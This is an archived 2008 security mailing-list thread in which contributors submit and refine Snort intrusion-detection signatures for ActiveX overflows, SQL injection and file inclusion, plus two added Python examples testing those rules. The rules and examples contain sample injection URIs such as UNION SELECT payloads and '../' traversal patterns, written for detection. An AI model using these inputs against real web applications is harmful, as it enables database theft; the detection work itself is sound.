References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2909@webmail.latis.com> <48F8D75F.6060502@jonkmans.com>
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290B@webmail.latis.com>

Hi Matt,

We followed your lead; based on that, we can limit the source port from "any" to HTTP ports.
Please find the updated signature below:

Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2"; nocase; content:"PlainTextPassword"; nocase; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6761; reference:bugtraq,31783; sid:8465; rev:2;)

Thanks & Regards,
StillSecure

________________________________
From: Matt Jonkman [mailto:jonkman at jonkmans.com]
Sent: Fri 10/17/2008 12:20 PM
To: signatures
Cc: emerging-sigs at emergingthreats.net
Subject: Re: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-17-2008

signatures wrote:
> 4. Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2"; nocase; content:"PlainTextPassword"; nocase; classtype:successful-user; reference:url,www.milw0rm.com/exploits/6761; reference:bugtraq,31783; sid:8465; rev:1;)

Can we port limit this any?

Matt

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081020/ed4319a7/attachment.html

From signatures at stillsecure.com Mon Oct 20 08:49:11 2008
From: signatures at stillsecure.com (signatures)
Date: Mon, 20 Oct 2008 06:49:11 -0600
Subject: [Emerging-Sigs] StillSecure: 2 New Signatures - Oct-20-2008
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290C@webmail.latis.com>

Hi Matt,

Please find 2 new signatures:

1. Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods"; flow:to_client,established; content:"CLSID"; nocase; content:"7F9B30F1-5129-4F5C-A76C-CE264A6C7D10"; nocase; pcre:"/(Run|SetRegistryValueAsString|PerformUpdateAsync)/i"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32337/; sid:8474; rev:1;)

2. CafeEngine id Remote SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"CafeEngine id Remote SQL Injection"; flow:established,to_server; content:"GET"; pcre:"/\/(dish\.php|menu\.php)/Ui"; uricontent:"?id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/advisories/32308/; reference:url,milw0rm.com/exploits/6762; sid:8475; rev:1;)

Looking forward to your comments, if any...

Thanks & Regards,
StillSecure
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081020/d7826bb8/attachment.html

From jonkman at jonkmans.com Mon Oct 20 13:18:34 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 20 Oct 2008 13:18:34 -0400
Subject: [Emerging-Sigs] StillSecure: 2 New Signatures - Oct-20-2008
In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290C@webmail.latis.com>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290C@webmail.latis.com>
Message-ID: <48FCBD6A.8020506@jonkmans.com>

On the second one, we need a better content match before the pcre. Is there anything else we can use? If not, the general sql injection sigs will do the trick.

Posting the first one, thanks guys!!

Matt

signatures wrote:
> Hi Matt,
>
> Please find 2 new signatures:
>
> 1. Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods
>
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods"; flow:to_client,established; content:"CLSID"; nocase; content:"7F9B30F1-5129-4F5C-A76C-CE264A6C7D10"; nocase; pcre:"/(Run|SetRegistryValueAsString|PerformUpdateAsync)/i"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32337/; sid:8474; rev:1;)
>
> 2. CafeEngine id Remote SQL Injection
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"CafeEngine id Remote SQL Injection"; flow:established,to_server; content:"GET"; pcre:"/\/(dish\.php|menu\.php)/Ui"; uricontent:"?id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/advisories/32308/; reference:url,milw0rm.com/exploits/6762; sid:8475; rev:1;)
>
> Looking forward to your comments, if any...
>
> Thanks & Regards,
> StillSecure
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From frank at knobbe.us Mon Oct 20 14:00:26 2008
From: frank at knobbe.us (Frank Knobbe)
Date: Mon, 20 Oct 2008 13:00:26 -0500
Subject: [Emerging-Sigs] StillSecure: 2 New Signatures - Oct-20-2008
In-Reply-To: <48FCBD6A.8020506@jonkmans.com>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290C@webmail.latis.com> <48FCBD6A.8020506@jonkmans.com>
Message-ID: <1224525626.42047.23.camel@localhost>

On Mon, 2008-10-20 at 13:18 -0400, Matt Jonkman wrote:
> On the second one, we need a better content match before the pcre. Is
> there anything else we can use? If not the general sql injection sigs
> will do the trick.

Well, since it's only two choices in the pcre, why not break it into two rules with content match?

-Frank

--
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.
-------------- next part --------------
A non-text attachment was scrubbed...
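[Added worked example for this archive page. It is editor-written illustration code, not Snort, not anything StillSecure, Frank or Emerging Threats posted, and the sample request lines are made up.] Matt's objection to the CafeEngine rule (sid 8475) and Frank's fix are about cost, not coverage: the posted rule picks out dish.php/menu.php only with a pcre, so the regex engine runs on every GET the rule sees, while one rule per script with a literal uricontent in front lets the cheap string match exclude most traffic before any regex runs. The evaluator below walks the rule options in order and short-circuits on the first miss, a deliberate simplification of how Snort evaluates a rule body (uricontent and pcre /U are matched against the percent-decoded URI). Both variants are scored on the same constructed requests; the number to compare is the count of regex evaluations.

```python
"""Compare the CafeEngine rule as posted with the split-per-script version.
Illustration code for this list archive; the evaluator approximates Snort's
option walk and the request lines are constructed, not captured traffic."""
import re
from urllib.parse import unquote

# Constructed sample request lines (not real traffic).
REQUESTS = [
    "GET /dish.php?id=3 HTTP/1.1",                                             # benign
    "GET /dish.php?id=-1%20UNION%20SELECT%201,2,3 HTTP/1.1",                   # injection
    "GET /menu.php?id=2%20union/**/select%20user,pass%20from%20admin HTTP/1.1",  # injection
    "GET /index.php?id=1%20UNION%20SELECT%201 HTTP/1.1",                       # other script
    "GET /images/logo.png HTTP/1.1",                                           # benign
    "GET /menu.php?page=2 HTTP/1.1",                                           # benign
]

UNION_SELECT = re.compile(r"UNION.+SELECT", re.I)   # the rule's final pcre, /Ui


def uri_of(request_line):
    """The buffer uricontent and pcre /U see: the request-target after
    percent-decoding (a simplification of http_inspect's URI normalization)."""
    return unquote(request_line.split(" ")[1])


def evaluate(request_line, options):
    """Apply rule options in order, stopping at the first miss, the way Snort
    walks a rule body.  Option kinds (all case-insensitive, like nocase / i):
      ('content', s)     literal search of the raw request
      ('uricontent', s)  literal search of the normalized URI
      ('pcre', rx)       compiled regex against the normalized URI
    Returns (alerted, number_of_regex_evaluations)."""
    raw, uri = request_line, uri_of(request_line)
    regex_runs = 0
    for kind, pat in options:
        if kind == "pcre":
            regex_runs += 1
            ok = pat.search(uri) is not None
        else:
            buf = raw if kind == "content" else uri
            ok = pat.lower() in buf.lower()
        if not ok:
            return False, regex_runs
    return True, regex_runs


# Rule as posted (sid 8475): the script name is only checked by a regex, so the
# regex engine runs on every GET before any literal option can exclude it.
POSTED = {"8475": [("content", "GET"),
                   ("pcre", re.compile(r"/(dish\.php|menu\.php)", re.I)),
                   ("uricontent", "?id="),
                   ("pcre", UNION_SELECT)]}

# Frank's suggestion: one rule per script with a literal uricontent in front, so
# the regex only runs on requests that already name that script and carry ?id=.
SPLIT = {script: [("content", "GET"),
                  ("uricontent", "/" + script),
                  ("uricontent", "?id="),
                  ("pcre", UNION_SELECT)]
         for script in ("dish.php", "menu.php")}


def run(rules, requests=REQUESTS):
    """Evaluate every request against every rule.  Returns the (rule, request)
    alerts and the total regex evaluations, a rough proxy for per-packet cost."""
    alerts, regex_runs = [], 0
    for req in requests:
        for name, opts in rules.items():
            hit, n = evaluate(req, opts)
            regex_runs += n
            if hit:
                alerts.append((name, req))
    return alerts, regex_runs


if __name__ == "__main__":
    for label, rules in (("posted", POSTED), ("split", SPLIT)):
        alerts, cost = run(rules)
        print("%-6s alerts=%d regex evaluations=%d" % (label, len(alerts), cost))
        for name, req in alerts:
            print("    %s <- %s" % (name, req))
```

Both variants fire on the same two injected requests; the split version reaches the regex three times across the six requests where the posted rule reaches it nine times, and on real traffic the ratio is far worse because almost nothing arriving at a web server mentions dish.php or menu.php. The same reasoning is why the ActiveX rules earlier in the thread lead with a literal CLSID string and why Matt asked for the Hummingbird rule to be limited to $HTTP_PORTS: every cheap, specific condition placed ahead of the expensive one shrinks the traffic that has to be inspected in depth.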
Name: not available
Type: application/pgp-signature
Size: 187 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081020/9c204193/attachment.bin

From emerging at emergingthreats.net Mon Oct 20 16:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Mon, 20 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081020200008.4DC1F4502B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Mon Oct 20 16:00:08 2008 [***]

[+++] Added rules: [+++]
2008678 - ET EXPLOIT Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods (emerging-exploit.rules)

[+++] Added non-rule lines: [+++]
-> Added to emerging-exploit.rules (1):
#by stillsecure
-> Added to emerging-sid-msg.map (1):
2008678 || ET EXPLOIT Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods || url,secunia.com/Advisories/32337/
-> Added to emerging-sid-msg.map.txt (1):
2008678 || ET EXPLOIT Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods || url,secunia.com/Advisories/32337/

From jonkman at jonkmans.com Tue Oct 21 10:42:49 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 21 Oct 2008 10:42:49 -0400
Subject: [Emerging-Sigs] First OISF Brainstorming Session Scheduled
Message-ID: <48FDEA69.7090906@jonkmans.com>

Our first in-person, up-close and personal Open Information Security Foundation Brainstorming Session is scheduled. I'll be at Deepsec in Vienna November 11-14. The first two days are training, in which Victor Julien and I are doing a Protocol Analysis for Writing Snort Signatures class (2 days, in depth, you should come!). Then we've got space in the general conference on the 13th and 14th for the Brainstorming Session.

More on the schedule here:
https://deepsec.net/schedule/

As you can see there are some great sessions there. Jose Nazario, Joe Stewart, Johnny Long, all the greats.
This is definitely a conference to hit, and you can't beat Vienna for some good drinking with your history.

Again, this is just the first of many sessions we're going to set up. If you're going to a conference you think we ought to be at please let us know. There are so many coming up we need to make sure we hit the right ones.

Hope to see you there!

--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com Tue Oct 21 14:12:29 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 21 Oct 2008 14:12:29 -0400
Subject: [Emerging-Sigs] StillSecure: 2 New Signatures - Oct-20-2008
In-Reply-To: <1224525626.42047.23.camel@localhost>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290C@webmail.latis.com> <48FCBD6A.8020506@jonkmans.com> <1224525626.42047.23.camel@localhost>
Message-ID: <48FE1B8D.2020309@jonkmans.com>

Yes, we definitely could. I'll do so.

Matt

Frank Knobbe wrote:
> On Mon, 2008-10-20 at 13:18 -0400, Matt Jonkman wrote:
>> On the second one, we need a better content match before the pcre. Is
>> there anything else we can use? If not the general sql injection sigs
>> will do the trick.
>
> Well, since it's only two choices in the pcre, why not break it into two
> rules with content match?
>
> -Frank
>

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From emerging at emergingthreats.net Tue Oct 21 16:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Tue, 21 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081021200008.39C2A45026@goliath.jonkmans.com>

[***] Results from Oinkmaster started Tue Oct 21 16:00:08 2008 [***]

[+++] Added rules: [+++]
2008679 - ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (dish.php) (emerging-web_sql_injection.rules)
2008680 - ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (menu.php) (emerging-web_sql_injection.rules)

[///] Modified active rules: [///]
2008391 - ET MALWARE Suspicious User-Agent (svchost) (emerging-malware.rules)

[+++] Added non-rule lines: [+++]
-> Added to emerging-sid-msg.map (4):
2008679 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (dish.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/
2008680 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (menu.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/
2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
-> Added to emerging-sid-msg.map.txt (4):
2008679 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (dish.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/
2008680 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (menu.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/
2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

[---] Removed non-rule lines: [---]
-> Removed from emerging-sid-msg.map (2):
2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org
2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org
-> Removed from emerging-sid-msg.map.txt (2):
2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org
2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org

From signatures at stillsecure.com Wed Oct 22 09:22:43 2008
From: signatures at stillsecure.com (signatures)
Date: Wed, 22 Oct 2008 07:22:43 -0600
Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-22-2008
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290D@webmail.latis.com>

Hi Matt,

Please find 6 new signatures

1. Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"39FDA070-61BA-11D2-AD84-00105A17B608"; nocase; distance:0; content:"%5F%DC%02%10%cc"; nocase; distance:0; content:"SecretKey"; nocase; classtype:web-application-attack; reference:bugtraq,31814; reference:url,www.milw0rm.com/exploits/6793; sid:8479; rev:1;)

2. E-Shop Shopping Cart Script search_results.php SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"E-Shop Shopping Cart Script search_results.php SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/search_results.php?cid="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,30692; sid:8476; rev:1;)

3. Joomla DS-Syndicate Component feed_id SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Joomla DS-Syndicate Component feed_id SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/index2.php?option=ds-syndicate"; nocase; uricontent:"version=1"; nocase; uricontent:"feed_id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,www.secunia.com/advisories/32321; reference:url,www.milw0rm.com/exploits/6792; sid:8478; rev:1;)

4. zeeproperty adid Parameter Remote SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"zeeproperty adid Parameter Remote SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/bannerclick.php?adid="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32333/; reference:url,milw0rm.com/exploits/6780; sid:8477; rev:1;)

5. PassWiki site_id Parameter Local File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"PassWiki site_id Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/passwiki.php?site_id="; nocase; pcre:"/(\.\.\/){1,}/U"; classtype:web-application-attack; reference:bugtraq,29455; sid:8480; rev:1;)

6. XOOPS Makale Module id SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"XOOPS Makale Module id SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/makale.php?id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/advisories/32347/; reference:url,www.milw0rm.com/exploits/6795; sid:8481; rev:1;)

Looking forward for your comments if any...

Thanks & Regards,
StillSecure
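Five of the six rules above detect the injection with pcre:"/UNION.+SELECT/Ui" and nothing cheaper in front of it. The Python below is an added example, not part of this thread or of the ET rule set: it runs that pattern, the tighter UNION\s+SELECT form that other ET rules such as the Cacti rule (sid 2007889) use, and a hardened variant of my own (an assumption, not an ET pattern) over constructed URIs, with a uricontent:"UNION"-style prefilter in front, so you can see what each form matches, what it misses, and how many requests reach the regex engine at all. Snort's /U modifier inspects the normalized URI buffer; that normalization is approximated here with percent-decoding only.

```python
"""Compare the UNION/SELECT PCRE variants from the thread over constructed URIs."""
import re
from urllib.parse import unquote

# Pattern used in the StillSecure rules above: pcre:"/UNION.+SELECT/Ui".
PERMISSIVE = re.compile(r"UNION.+SELECT", re.IGNORECASE)
# Tighter form used by the Cacti rule (sid 2007889): whitespace only between keywords.
TIGHT = re.compile(r"UNION\s+SELECT", re.IGNORECASE)
# Assumed hardened form (my own, not from the thread): whitespace, '+' or an
# inline comment as separator, optional ALL, and word boundaries so that an
# innocent "reunion+selection" cannot satisfy it.
SEP = r"(?:\s|\+|/\*.*?\*/)+"
HARDENED = re.compile(rf"\bUNION{SEP}(?:ALL{SEP})?SELECT\b", re.IGNORECASE)


def normalize_uri(raw_uri: str) -> str:
    """Approximate the normalized URI buffer that Snort's /U modifier inspects.

    Only percent-decoding is modelled; real http_inspect also folds multiple
    slashes, directory traversal and other encodings.
    """
    return unquote(raw_uri)


def prefilter(uri: str) -> bool:
    """Cheap gate equivalent to uricontent:"UNION"; nocase; placed before the pcre."""
    return "union" in uri.lower()


def evaluate(raw_uri: str) -> dict:
    """Return which of the three patterns would fire on one request URI."""
    uri = normalize_uri(raw_uri)
    gate = prefilter(uri)
    return {
        "prefilter": gate,
        "permissive": gate and PERMISSIVE.search(uri) is not None,
        "tight": gate and TIGHT.search(uri) is not None,
        "hardened": gate and HARDENED.search(uri) is not None,
    }


def pcre_invocations(uris, use_prefilter: bool) -> int:
    """Count how many URIs would reach the regex engine at all."""
    if not use_prefilter:
        return len(uris)
    return sum(1 for u in uris if prefilter(normalize_uri(u)))


# Constructed sample URIs for the makale.php rule above (not captured traffic).
SAMPLES = {
    "legit_plain":      "/makale.php?id=1",
    "legit_union_word": "/index.php?page=union-history",
    "legit_reunion":    "/makale.php?id=5&q=reunion+selection",
    "classic":          "/makale.php?id=-1%20UNION%20SELECT%201,2,3",
    "union_all_plus":   "/makale.php?id=-1+UNION+ALL+SELECT+1,2,3",
    "comment_sep":      "/makale.php?id=-1/**/UNION/**/SELECT/**/1,2,3",
}

if __name__ == "__main__":
    for name, uri in SAMPLES.items():
        print(f"{name:18} {evaluate(uri)}")
    uris = list(SAMPLES.values())
    print("pcre calls without prefilter:", pcre_invocations(uris, False))
    print("pcre calls with prefilter:   ", pcre_invocations(uris, True))
```

The run shows the trade-off directly: the permissive pattern fires on "reunion+selection" (a false positive), the tight pattern misses both "UNION+ALL+SELECT" and "UNION/**/SELECT" (which is one reason an author might reach for .+), and only the legit request without the substring "union" is spared the regex when a content match precedes the pcre.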
From jonkman at jonkmans.com Wed Oct 22 15:16:37 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 22 Oct 2008 15:16:37 -0400
Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-22-2008
In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290D@webmail.latis.com>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290D@webmail.latis.com>
Message-ID: <48FF7C15.6030904@jonkmans.com>

Lovely sigs! Thanks

Posting them now.

Matt

signatures wrote:
> Hi Matt,
>
> Please find 6 new signatures
>
> 1. Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow
> 2. E-Shop Shopping Cart Script search_results.php SQL Injection
> 3. Joomla DS-Syndicate Component feed_id SQL Injection
> 4. zeeproperty adid Parameter Remote SQL Injection
> 5. PassWiki site_id Parameter Local File Inclusion
> 6. XOOPS Makale Module id SQL Injection
> [...]
>
> Looking forward for your comments if any...
>
> Thanks & Regards,
> StillSecure
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From emerging at emergingthreats.net Wed Oct 22 16:00:07 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Wed, 22 Oct 2008 16:00:07 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081022200007.DCD5F45026@goliath.jonkmans.com>

[***] Results from Oinkmaster started Wed Oct 22 16:00:07 2008 [***]

[+++] Added rules: [+++]
2008681 - ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php (emerging-malware.rules)
2008682 - ET TROJAN Trojan.Zonebac.D (emerging-virus.rules)
2008683 - ET EXPLOIT Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow (emerging-exploit.rules)
2008684 - ET WEB_SPECIFIC E-Shop Shopping Cart Script search_results.php SQL Injection (emerging-web_sql_injection.rules)
2008685 - ET WEB_SPECIFIC Joomla DS-Syndicate Component feed_id SQL Injection (emerging-web_sql_injection.rules)
2008686 - ET WEB_SPECIFIC zeeproperty adid Parameter Remote SQL Injection (emerging-web_sql_injection.rules)
2008687 - ET WEB PassWiki site_id Parameter Local File Inclusion (emerging-web.rules)
2008688 - ET WEB_SPECIFIC XOOPS Makale Module id SQL Injection (emerging-web_sql_injection.rules)

[+++] Added non-rule lines: [+++]
-> Added to emerging-malware.rules (1):
#by Deapesh Misra
-> Added to emerging-sid-msg.map (8):
2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz
2008682 || ET TROJAN Trojan.Zonebac.D
2008683 || ET EXPLOIT Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow || url,www.milw0rm.com/exploits/6793 || bugtraq,31814
2008684 || ET WEB_SPECIFIC E-Shop Shopping Cart Script search_results.php SQL Injection || bugtraq,30692
2008685 || ET WEB_SPECIFIC Joomla DS-Syndicate Component feed_id SQL Injection || url,www.milw0rm.com/exploits/6792 || url,www.secunia.com/advisories/32321
2008686 || ET WEB_SPECIFIC zeeproperty adid Parameter Remote SQL Injection || url,milw0rm.com/exploits/6780 || url,secunia.com/Advisories/32333/
2008687 || ET WEB PassWiki site_id Parameter Local File Inclusion || bugtraq,29455
2008688 || ET WEB_SPECIFIC XOOPS Makale Module id SQL Injection || url,www.milw0rm.com/exploits/6795 || url,secunia.com/advisories/32347/
-> Added to emerging-sid-msg.map.txt (8):
2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz
2008682 || ET TROJAN Trojan.Zonebac.D
2008683 || ET EXPLOIT Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow || url,www.milw0rm.com/exploits/6793 || bugtraq,31814
2008684 || ET WEB_SPECIFIC E-Shop Shopping Cart Script search_results.php SQL Injection || bugtraq,30692
2008685 || ET WEB_SPECIFIC Joomla DS-Syndicate Component feed_id SQL Injection || url,www.milw0rm.com/exploits/6792 || url,www.secunia.com/advisories/32321
2008686 || ET WEB_SPECIFIC zeeproperty adid Parameter Remote SQL Injection || url,milw0rm.com/exploits/6780 || url,secunia.com/Advisories/32333/
2008687 || ET WEB PassWiki site_id Parameter Local File Inclusion || bugtraq,29455
2008688 || ET WEB_SPECIFIC XOOPS Makale Module id SQL Injection || url,www.milw0rm.com/exploits/6795 || url,secunia.com/advisories/32347/
-> Added to emerging-virus.rules (1):
#ref 483dbf6dd97ec249b0ec84a358e39260
-> Added to emerging-web.rules (1):
#by Stillsecure
-> Added to emerging-web_sql_injection.rules (1):
#by stillsecure

[---] Removed non-rule lines: [---]
-> Removed from emerging-sid-msg.map (2):
2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
-> Removed from emerging-sid-msg.map.txt (2):
2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From r.kerr at cranfield.ac.uk Wed Oct 22 16:24:30 2008
From: r.kerr at cranfield.ac.uk (Robert Kerr)
Date: Wed, 22 Oct 2008 21:24:30 +0100
Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-22-2008
In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290D@webmail.latis.com>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290D@webmail.latis.com>
Message-ID: <1224707070.15370.24.camel@clarity.local.home>

On Wed, 2008-10-22 at 07:22 -0600, signatures wrote:
> 6. XOOPS Makale Module id SQL Injection
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"XOOPS Makale Module id SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/makale.php?id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/advisories/32347/; reference:url,www.milw0rm.com/exploits/6795; sid:8481; rev:1;)

Can we have a discussion on the merits of pcre:"/UNION.+SELECT/Ui"; as appears in many of these rules. Two concerns:

a) PCREs are slow and should always be well anchored.
Would make sense to precede each pcre with a uricontent:"UNION"; to prevent the pcre firing on every hit to pages which are otherwise legit.

b) The .+ seems overly permissive in that it allows 1 or more of any character in between the union and select? A quick look at other rules of this type seems to suggest they use UNION\s+SELECT

Compare for example this rule:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Cacti SQL Injection Vulnerability graph_view graph_list UNION SELECT"; flow:established,to_server; uricontent:"graph_view.php?"; nocase; uricontent:"graph_list="; nocase; uricontent:"UNION"; nocase; pcre:"/.+UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:cve,CVE-2008-0785; reference:bugtraq,27749; sid:2007889; rev:2;)

Not having looked deeply at any of the bugs concerned it may be possible there's something odd going on that makes \s+ not suitable?

--
Robert Kerr

From emerging at emergingthreats.net Thu Oct 23 16:00:08 2008
